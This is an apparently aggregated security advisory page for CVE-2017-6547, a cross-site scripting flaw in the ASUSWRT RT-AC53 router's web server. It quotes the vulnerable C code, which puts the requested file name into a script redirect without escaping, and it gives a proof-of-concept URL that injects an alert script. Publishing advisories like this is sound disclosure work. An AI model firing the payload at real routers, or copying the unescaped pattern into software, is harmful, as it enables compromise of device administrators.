Lucene search
K

ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting

🗓️ 08 Mar 2017 00:00:00Reported by Bruno BierbaumerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 77 Views

ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting vulnerability in httpd componen

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2017-6547
9 Mar 201709:26
cve
Cvelist
CVE-2017-6547
9 Mar 201709:26
cvelist
EUVD
EUVD-2017-15603
7 Oct 202500:30
euvd
exploitpack
ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting
8 Mar 201700:00
exploitpack
NVD
CVE-2017-6547
9 Mar 201709:59
nvd
Packet Storm
ASUS WRT Cross Site Scripting Nmap NSE Script
7 Apr 201700:00
packetstorm
Prion
Cross site scripting
9 Mar 201709:59
prion
Symantec
SA148: Linux Kernel Vulnerabilities Feb-Apr 2017
9 May 201708:00
symantec
seebug.org
ASUSWRT - Multiple Vulnerabilities
10 Mar 201700:00
seebug
Cross-Site Scripting (XSS)

Component: httpd

CVE: CVE-2017-6547

Vulnerability:

httpd checks in the function handle_request if the requested file name is longer than 50 chars. It then responds with a redirection which allows an attacker to inject arbitrary JavaScript code into the router’s web interface context.

...

if(strlen(file) > 50 &&!(strstr(file, "findasus")) && !(strstr(file, "acme-challenge")))
{
    char inviteCode[256];
    snprintf(inviteCode, sizeof(inviteCode), "<script>location.href='/cloud_sync.asp?flag=%s';</script>", file);
    send_page( 200, "OK", (char*) 0, inviteCode, 0);

...
PoC:

http://192.168.1.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('XSS');'A

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Mar 2017 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 24.3
CVSS 36.1
EPSS0.01043
77